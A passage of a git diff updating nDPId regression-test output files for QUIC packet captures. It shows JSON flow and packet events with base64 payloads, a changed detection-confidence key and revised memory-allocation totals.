FNy2qBWMNwCptrLdwN5PCZlQ07ewM1OmYFXib\/9zYOSk4B0N24Ml1I3V+BUt9Q\/f7In0Lo1bYVhzoFFJnm1wIhEDEaXvsKWXwZTHPIpl1Hz1I\/6Yq3hsX1N3dtM00S1An2mdoc9+06efV9TeSDkQwX8r+ZabNOKTRtHqXDe1Wl+aE\/ZahNHsuY3HnDuGINcHsBCTv1ovOmoDAi0RUdYM0lPaGHSMu61RpKW5cRQ0Cdy0+WZXfm0NBcMkEOs1K83zDl3Ni0ybs6vWiqa45kxw7H1vC362nLorQvhZdy7wTrE4RWiFGT0Xccp4Rl8QprALjpWqFcS7MPnifCUJZzLuwLuogz6ePAO7YscFlIza4b2sSjihSJrD9QLuOyhifjzSEn4amVk5ivqXVE+QZ1R7NVlYJU0wlh1SwakKVblsHRVpjkjVrp5to9V854cET1W0se7gIi2a7oXoLvW8CT8NdthxNrd\/AUaazo7KSGS96THBAG+HmraPSIMT5EEnSDc\/KXc1EWvMFe0xKOugeQC4v6tFGa5dLsgNI0TE"} -00676{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1593498296832,"flow_last_seen":1593498296832,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1593498296832,"l3_proto":"ip4","src_ip":"10.230.40.168","dst_ip":"94.97.225.146","src_port":62196,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}} +00676{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1593498296832,"flow_last_seen":1593498296832,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1593498296832,"l3_proto":"ip4","src_ip":"10.230.40.168","dst_ip":"94.97.225.146","src_port":62196,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}} 00547{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1593498296833,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":106,"pkt_l4_len":86,"thread_ts_msec":1593498296833,"pkt":"RQAAapbBAABAEXBACuYoqF5h4ZLy9AG7AFbkKub6zrABCEACR1YBz3h7AD4ztLOg+8\/NWUDesKp0sDyq9wl\/qnK\/iaP4qknLwsMfEkvd24lrwL0JnOo2eK80vHLhCKIp2AiTqDI94jB8\/Q=="} 00547{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1593498296833,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":106,"pkt_l4_len":86,"thread_ts_msec":1593498296833,"pkt":"RQAAapbBAABAEXBACuYoqF5h4ZLy9AG7AFbkKub6zrABCEACR1YBz3h7AD4ztLOg+8\/NWUDesKp0sDyq9wl\/qnK\/iaP4qknLwsMfEkvd24lrwL0JnOo2eK80vHLhCKIp2AiTqDI94jB8\/Q=="} -00709{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":353,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":353,"flow_first_seen":1593498296832,"flow_last_seen":1593498297036,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":390606,"flow_avg_l4_payload_len":1106,"midstream":0,"thread_ts_msec":1593498297036,"l3_proto":"ip4","src_ip":"10.230.40.168","dst_ip":"94.97.225.146","src_port":62196,"dst_port":443,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00709{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":353,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":353,"flow_first_seen":1593498296832,"flow_last_seen":1593498297036,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":390606,"flow_avg_l4_payload_len":1106,"midstream":0,"thread_ts_msec":1593498297036,"l3_proto":"ip4","src_ip":"10.230.40.168","dst_ip":"94.97.225.146","src_port":62196,"dst_port":443,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 00583{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":353,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","packets-captured":353,"packets-processed":353,"total-skipped-flows":0,"total-l4-payload-len":390606,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1593498297036} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 353/353 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5889760 bytes -~~ total memory freed........: 5889760 bytes -~~ total allocations/frees...: 118486/118486 +~~ total memory allocated....: 6023394 bytes +~~ total memory freed........: 6023394 bytes +~~ total allocations/frees...: 121248/121248 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 486 chars ~~ json string max len.......: 2110 chars diff --git a/test/results/quic-mvfst-27.pcapng.out b/test/results/quic-mvfst-27.pcapng.out index 755230e7c..9dd7a7308 100644 --- a/test/results/quic-mvfst-27.pcapng.out +++ b/test/results/quic-mvfst-27.pcapng.out @@ -1,10 +1,10 @@ 00466{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"quic-mvfst-27.pcapng","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic-mvfst-27.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":41432,"flow_last_seen":41432,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":41432,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"69.171.250.15","src_port":35957,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02172{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic-mvfst-27.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":41432,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1326,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1326,"pkt_l4_len":1240,"thread_ts_msec":41432,"pkt":"UlQAEjUCCAAnANMtCABFAATsAABAAEAR6jcKAAIPRav6D4x1AbsE2OWQzPrOsAIIrbuyBEpv1K8AAES+140kYx8r1I1jytRmSbOd1I6+euAu\/WCog0hZ7CK2vbiQaDsUNhduZ4TaOU+YwMwzr4tFRPY4WVcwFZYxf3JpeyRLGb56IxYnrJ+wVEN3bI7bVdKHF8LObpsuaNgGvwptfsH+rDACd3BONx\/QShlSNEGgtojOTAb3IBxaMPoBBrqk2vcqdCneK9x+zToW6kQDTdEd1IieGWgR+hdSwpMJLkz6epIDIJvr2+7hnKY8vsay1GJiKAlvxUurjQpspuMDfgvdh0iM6M1FrTv7rKzGyRXK46jvoMQof1iOAPHATgwqM4ZuYMuNvt\/y0p1tz148IXIa\/fLbIf\/jtx8RB3egC2zhGA2mbRbaurTTw48eZ\/8+UmFX\/pGgD39VTuQ0iy3fwQ4KqkHSAZwYDfMrqtGQuy3zdVoOJcB1EfGcQ\/j15ErCmDlRT7vkVVWnNzp5ac2qQ30IkEy79yMP2uQl+qcNCK7LBv3ES0ZAYMoMzeMHxcHojmxmY7m9pU8\/6TN1mmhBOL55YskIGgF5b9dubHYOHRFbIoVzLmlUMAC3n\/J8icXYhMzF+2LMmkFk5V6Ftpg6RFwazyDsV1VvAG0px\/ZReUsDZc2BpKOvPXUMcmmbi7J+4xk79GjDWU7qn9No\/9OgaUBSqlTMXjLKVw1AQS9DQbbP6Ljm2tjkBmxsNgiaX3ZHZdlEZ39g+pfa+C3d0\/Me91SnnyzofgyFHFf\/FZrz8kZlG+cPy3y6jToJU9oYVkDn4scTl9+EJRhVW2fiSh2BpNrkr1jxBS6nl0AbZVVuTjZo1emeItVe2pTwk9uLFdXZ\/CsWVBwjAwBQ8vxgzBGFWe9Cz3WpWkEzkAzQeOKzfLIFJb1PdMquNCwMajA4Jx\/Cl8vTf2306+VAoELddtYLnop0Ayp+TxS0Rn4I5pIhgtvtCnBaEOMmPLVrk2Tj6N4i6o4MT6NN2UsGMhl2jrLGVEchP8VeBBOrUPQTIvY+Xm1UQd6ud\/GSXz1lmW9JWN\/jvl2VrC\/dEdNNNDsuFT5DVQqiDS81yxHlMqpnUJtGOqdXBxl\/ipvbbIFVJMAxqaqhOIq9lLXVi0WRSrle2jY8C6byBzVmaXR9ob+Wj5JgOJ4dl6+zmTJfROyutrX06SLZW3iXBCGlGsJZa3VoAGsKr8R2PPaQW1IM5QBB1\/g3l2+\/8cMTpVbSj+AToLePRXNLpaht6\/i0lf5tmm5WeIZEw\/kp8XgE1IVG1OwCHdXi3LW8Ju6ZT6+NSDZYRl5iCIMOLeH+Uqa7zxr6BPSdijI5fZHwJ7CyzIIsLtNldUOOeWaUdszlpTm5UglrnEBk\/8+KIWEVomulKHSD78LbyMa2ZwRhHyUIoQUx3u628eG5WvmgiPmoWBpQq0SAcNJkibSZlfyukZBXk6ytoD7RL+6u7B+gDbgoIKW3EI2Vygx0786PDvzKNz\/jICcqh071958oOMWvZwK4wNNnPl+hmatacx8NLqlbU4\/qy23i+aLaPb\/wBxpmPXyakND4mOvFt3dmh\/yOVbINbAdZZ958R4K\/VXTGhgBSkxwXbKGKq+I\/xQwGAiri3PaDQBO6NYoKc0jqzc3rTGw44eUPJeiqQ8qEhbvrsfPi3A+VS5FRGlwZaAkkAdoB2gRkAwEAAAAAAAAAAAAAABYAAQACACEB2gAAAAAAAAAAAAAAAAAAAAANY6kd"} -00826{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-mvfst-27.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":41432,"flow_last_seen":41432,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":41432,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"69.171.250.15","src_port":35957,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Facebook","breed":"Fun","category":"SocialNetwork"},"quic": {"client_requested_server_name":"graph.facebook.com","version":"TLSv1.3","alpn":"h3-fb-05","ja3":"61d8a93ff379660087082a82411f19a2","tls_supported_versions":"TLSv1.3,TLSv1.3 (draft)"}} +00826{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-mvfst-27.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":41432,"flow_last_seen":41432,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":41432,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"69.171.250.15","src_port":35957,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Facebook","breed":"Fun","category":"SocialNetwork"},"quic": {"client_requested_server_name":"graph.facebook.com","version":"TLSv1.3","alpn":"h3-fb-05","ja3":"61d8a93ff379660087082a82411f19a2","tls_supported_versions":"TLSv1.3,TLSv1.3 (draft)"}} 02198{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic-mvfst-27.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":41464,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1346,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1346,"pkt_l4_len":1260,"thread_ts_msec":41464,"pkt":"CAAnANMtUlQAEjUCCABFAAUAAHoAAEARKapFq\/oPCgACDwG7jHUE7DGTx\/rOsAIACGUZSqSBwJ2mAETSQ4uzcebnNMDWiCLwgEqse1zwFbQeUwCYbirASYBY9Wqb\/AVucNo+1QzVbJaW9TpMoqvmNgwqhyeKJHn4nzURskXOXtyoQu1UCn4VWBURvJjr0Pri5khEPw4xAwDV7X2Rmmpwaw6btUsOaonrqKF\/SrLeyArFzwB+JFVws5mjdog13nZj3AyrnfXROIcoKcafi5iIMUPL8fCRhq9X7vo879HkMFFe\/UL0Z6KfMxRHk\/gm5EOke7DkOtpvDqjM8A17vn\/YA\/LmKAMC318G22YHyWoexSGb3BcRVBGh\/JnZslVfKZDHgCPKBJ6TZoECS2S1Lkq5nHD0FrjB28JkpPGddocsvTJ4gXR11CtFRogKRhcL6ToomCWSsXQm4N4h+xa8EUgP+Qp0EvdNEgFlkK7QzIbTOeUkbO0qojWV6pfET3Iov+\/apIMX2oqertd1yP5huAQbmPBJDrUV5aSXJ2n4942yy8nej3YOzA3244Ppj3KJ1FI9fYQWy94tzkcAq0MyyNAtAzVQrMQHV9+ftrN2eaUEuTAr5G712uv1AnCx12zkzS\/bPkH5HakesCqHiBdPHaH4mxGfceFuvWrXvk9k8noKiLgriTnvQwp\/saWNDkm8kvfm9PpqQm+XgxMCJ0tq2pG80BHbTgRQV8MdZ11XnvblfPEVlDFLqayo6KQYDuE9pUfQ+9AqEaxGVZRMSVRaIpJDPVqd0UHWM8ATc92GN71YPW\/frstXWA7sGYASVobLo1b3c8kYQSBM7dcU\/iqAkl+FksHEaC1aLZjGfaRKtnrpTDuyyUXcztv9cqa5wo9RQzervEK0UxM3gVjtBBX1mCaBfaZIZdXvbDZThkMu9RGphMLYrx9SqWAcKRkM9YhQ4qnUOJEDTD2qoX8miGa+JoKbQ6qKnL2RRJM\/0dLcmr8S6LVgNf3TuED+N3hbsZ9OBQ7xHjHnYpm\/+OxE3iCQ7O\/MjCEYbY876HUh2UXvGhRXGh19ilKbwQQLH+dz5uix38Q4qECRqV09vmTz3Swbe+BtJ26CqtxI2DYiDUkT56hG4GnrWss\/5mqds3b7uwxVTv8iRTcgWALX6YR8I8LcEwnW6P35r6yzQ8NmLvjaaqZkC\/6YKBBhBFJ4gpdUENYZBLszMz\/0jCicUWKWyfwMDGVvAlcFM7uVWLy8jO0qLX37EScSwg3DeIeQr72\/VcJHLle0Tm+dHFDyuGwxcML\/AaZe6mgicoiyETeB09Smyq9Y78I5wTornR4T1K0JN64JfYcnJe1\/YmYcW1VlHkcIRW6sSa0q5r9kPM+iCHOL7wY9T6OnVogbkFJzee5fZ+Oq9S8PvlK+4jsPkUzDv6d3+PRuP5JWYWDpXd8Qhym58OswJSKelR1rmXKN2C\/uxVLv3kgZxbiHXFdSArCkFj5BWP4WtRYPeuQ5VALz9l8XUPpyq\/09yKtHs\/TW2KvPCNoNxInVtL\/9V7UyFB2cFMukn2UUKBEJJUOWG0p+3sALv+tMcZpDx9cDnCtfccjlF6qNg6Io5OabNDbmM3UDOyuHva8jvqAsKtELxYaeOp5rbZaQ+wK7lDWDooe0BUvE8YL9NWtHK\/I2zrwe4HzXFx1p5ULH4KoSajttOnTnVRnoaPTH5vR+8nV092hE6ZD\/6m9zExloCSQB2gHaBGQDAQAAAAAAAAAAAAAAFgABAAIAIQHaAAAAAAAAAAAAAAAAAAAAACg8yWg="} 02198{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quic-mvfst-27.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":41464,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1346,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1346,"pkt_l4_len":1260,"thread_ts_msec":41464,"pkt":"CAAnANMtUlQAEjUCCABFAAUAAHsAAEARKalFq\/oPCgACDwG7jHUE7Icwx\/rOsAIACGUZSqSBwJ2mAETStSk6pRwdyId1aH4WX4pVsk+hVtbLW4hKoqKIUKSo9tdUjjTVL5Yto7M3DICwaAoLYXCD+5dqw0TmZSrfqNiW2qJkNrsg0k\/kAdqV7j6+J9emg0iopVNY8z94Dkdknf05ci\/NoDXo7jX0aTp1J6GxxB8erH\/0SWZ+DyrbIMZ0xZ5SuS1DqMnN61NBKxN4\/jPv9ciPfLFFXyU0okn\/oJgJdQ4WrwMnOPK0yukS3dDQKMu5v+5h3OqBwQW1oLHmZA6rMWwlnpuiFU739YXcxuHETmzC2NOSBa0FZ1xSGByNv0mIS\/veQS6ztyCKi6cmIt52Goz5V26xn8ITbWRMKyzCQ9ygzGjFLSLB+V+ogEf08ganfO6W0dHJdPTEHqx274QToI6nzYBz8eQeCAoVd4nrh3slWslWTkHeQVW8sENY6mHlCHceqCHC8YwsKeoSN\/4JG6l1w4zyPArMZGkKB7jSxPuUQCGzOht7pw5Gk5Gp83Di44gZYUIyNVymDB16sT39aoraDeo5r5qBdNZ91SsMzaUcukPc+uOFPSAz0EuZbTe9n8OtdEkkzeGl9cG18rBcD7tfjxG18gi\/aTc\/Qsb2KdP82bZ\/OipJydJdUpM++DNflKBUq6VmZNq\/mEwBZaf36uML1LJOAoceV1rx2cgE7b5Wa2y583PSIvc0y8yCVCHd7UpFmIJOJrYMAiOgNdkL9i8G7a60vJ0BffKaiILbh52Cd\/gZSExquDEnfPS9pscJ3chfy\/\/FZGZ2CQbE65G5r2LgRj1a0KrZ\/O4ML+0k9MQaf9He5c\/jILvUKyvJwLUWG3lSoXOphrxABdatvx5PAii2lwtYhrYvxbQdkmGsIRtsvgWyth\/48R3yefn+bIHFq+Ln\/mQ4+8W6h+y9VYGjLy+j1gNFUujglm08r+aneixuCDo8NVE+WAW9F9bx6GkTQPaTP2\/obE0Ej5h95N8FRRXbNl8Q32+hc1BcPW7PYZhe4s7f99gVOs1PvusSkQjfl9x1h6vbtCoGsaxvv+KkMXJr040is81X8KUUNFqu8hZlZbEQdDUlK04iWVHyjfijDT4J15Tv7e9ZlWiE8P4TthJEkS\/V\/B6UFWx7NxNha5AI5q7ShAs7c3HMWi7ShahE0cUHWo1N0zwF8\/WnAGHEQUC8y4BhBQ7EaKwJ5nulzruzqp+D0MI00rZhOKTfBp6FWu0gmkwjBtMV14lN3KiO+Fugvl0PPD7usXWaKzR2dw4JslfP5IRxZB5PlrUhggAF+4XvJxhjRYhltzgO0VmcidYbokhyBxc5p8EN7Brdd5jbC5KWU5ziyf1Xh75DhXXM9GVyTUDxQyOG\/19oznEsnm6HNfViWsEBqqhaXc1PD0G1Ath517JUA\/pAp9aK6ha0kEfZOISLrdAh\/wfyRh1qF0vTiaYWT3z2kewwb2CKR6DkEQkLWuW6ksgBnomifnuXO\/A4qhCgYZUw8feNCqTOFonKJtx2NUnViJDtqHr07cnNA2vZFiN+8SsLW130LG60Uj0wsHpIPMQDNy88BvEV2fH8Yk1GkJTndWveloeKe4e8X8FUWonC0LnETHyEJoR6mY698HICIqyNVbCWwwIZl3RhkLsYcNRGWOHE1xH8nz2KWwIwVPQWegjsOIMvejTuWRloCSQB2gHaBGQDAQAAAAAAAAAAAAAAFgABAAIAIQHaAAAAAAAAAAAAAAAAAAAAAB\/S7Lg="} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"quic-mvfst-27.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":41432,"flow_last_seen":50392,"flow_idle_time":200000,"flow_min_l4_payload_len":21,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":9519,"flow_avg_l4_payload_len":475,"midstream":0,"thread_ts_msec":50392,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"69.171.250.15","src_port":35957,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Facebook","breed":"Fun","category":"SocialNetwork"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"quic-mvfst-27.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":41432,"flow_last_seen":50392,"flow_idle_time":200000,"flow_min_l4_payload_len":21,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":9519,"flow_avg_l4_payload_len":475,"midstream":0,"thread_ts_msec":50392,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"69.171.250.15","src_port":35957,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Facebook","breed":"Fun","category":"SocialNetwork"}} 00555{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":20,"source":"quic-mvfst-27.pcapng","alias":"nDPId-test","packets-captured":20,"packets-processed":20,"total-skipped-flows":0,"total-l4-payload-len":9519,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":50392} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 20/20 @@ -14,9 +14,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5880134 bytes -~~ total memory freed........: 5880134 bytes -~~ total allocations/frees...: 118155/118155 +~~ total memory allocated....: 6013768 bytes +~~ total memory freed........: 6013768 bytes +~~ total allocations/frees...: 120917/120917 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 471 chars ~~ json string max len.......: 2203 chars diff --git a/test/results/quic-mvfst-exp.pcap.out b/test/results/quic-mvfst-exp.pcap.out index 9848c0cac..93113ec09 100644 --- a/test/results/quic-mvfst-exp.pcap.out +++ b/test/results/quic-mvfst-exp.pcap.out @@ -2,10 +2,10 @@ 00554{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"quic-mvfst-exp.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1600365863681} 00641{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic-mvfst-exp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1600365863681,"flow_last_seen":1600365863681,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1600365863681,"l3_proto":"ip6","src_ip":"2aac:cdf7:d506:7807:9092:75f:a963:f4ab","dst_ip":"3f65:ece9:fe71:6e2a:face:b00c::358e","src_port":57587,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02148{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic-mvfst-exp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1600365863681,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1600365863681,"pkt":"AAAAAAAAAAsAUu6Rht1gBpyIBNgRPyqszffVBngHkJIHX6lj9Ks\/Zezp\/nFuKvrOsAwAADWO4PMBuwTY\/EXK+s6wDgg1+NsuZhAnFwAARL4kVSVotvSiGmEI+vf+6CaV5hF7i\/CNKP0SXP7gxh\/sxeTenPB321XyE03WMCMX5b0eBa3DvRz2ddP3nWt6RdJ6WlZ9RTUGfAgTt+boE098trxFEsZIDO4\/DGShxxtoHXyvbFJFZJY0NVf+5UIwrXhHYlSki1K9uuFNSNm\/ALl0YIaUgr\/hopr4M+GsiGyiXAxXGDCmRgFFJroypQa7DZkA\/BSQvOBo1rqXUCQO+Y2WWIxccuRC5scGp+LAauwOKvDUuqswyG3OiHxvk+4qy\/tgRCHGZHD5raZzP7vxY5Zs6GXSOIKOFNW9+pK0jmGVAbreKgkrE9sNhCR5J7EDI\/UBo5nIVV7hZ+6dUskPxqT226TZBRzj0d\/LhQMJiWr\/Qtbyf20wKLkGnJvpCUZRODDUv\/HGzAiYKec9iLyl0xI4dsRlBPj3\/qk96+vHWCFBI5LJgkJSDIg2Oo0As+19Rmue72aosPjR8lHRyP7b2qSVRFvzkCL3hktDhhGNO2\/8vk6Dat1dxesYiMWkhhopkoH3vOXEevmQ1BrZpcIa7nhP0ob5JIk\/hYvfODfiXG2nnd65+lyb3xKLOkY1QOG2eHx4XtxJxV95ybltVj+AOro0Qb33f0uOBVhhxvPUxRnp1BveoGGqIq\/gfX6EzojL9Sr70hu0h97z51g5q\/G2yqDMTtMccVw+1tkM704jcVZPtS1KIRHzNry1Wih4L55uLybOgft8GHReUqVXO1rtmuTmjHvXxkkq+hW3ZO6Zpt9Zifkk1BLxuaoYoAdg22ALnpTN7VcYCixWlGY122eH2AkgeHYXtrQFh65CCR9dukVHEdRzSFLcF70tHYbZmR+Hm+VVpk48niHEmJvv4wz9TBdQco4TCXjTYLJ6WcVyXCnuHUIWmzQviL8DqcqYSvAxXtEwy\/ABThsNXM6AftQYLRXbcYkYcHWoidGESnafRJGVZwQz25kCkv7ZqgFWYx1xBNnbz9WMnFbBke3DlYRgpZd0ntBDhPehb1WGgxtlkSGO7bjYqCQFYUxhzr1MjEh8JkUM3KCwxgTJlwEoiFSZNBGWOnQnoaXqibsTGdkQ5xDUg\/xJIomN6D9X+YN7QfJRKDelG4gB\/R7MztnSA22E0XjX\/\/YRNN+qvPmrVWdwLFx5rwOTZ2Bwq1XJX0Y4X9FYc8xlkhOJreo9JcUXHssUuTUo6BWARFU9bhlwavKy3u7J0kMozdjG\/WbocG2iKuKdvYnwlwF4XA49pUvEDnV0LhAGSigDeY9WEVq5NPU8kaL0aKpcV9sZJjCTDkCQvVnASsCd3+zuMIFTH\/wm3IfeUdpSYh69FBYn0JPZJnE\/f2WC+G83QQZNTxoXLd9yFjxvmJQ7W1L4zZf2d490E4pdqLfAEFuTNKFuLGgQ+LZN4YH\/5qowNrJyvVezIyiysoAoiKoYlx0R5mslIlSfPbwSJbTB1uxs3rqeOf8ivbtSiOzeCzsWNJXJslzqZupoGqw7\/SmaFxzLXGXzdi02UgxbJUV3MNetwoWntiOQ\/Z\/49uutTCmO52WyUtp6uT2QPgpYOad0YVkiJmMQURNTDa6EXQiGewAMntXsHYGBjMrsKmJQ9FFiiK9Zn62NIBtpITbvAg=="} 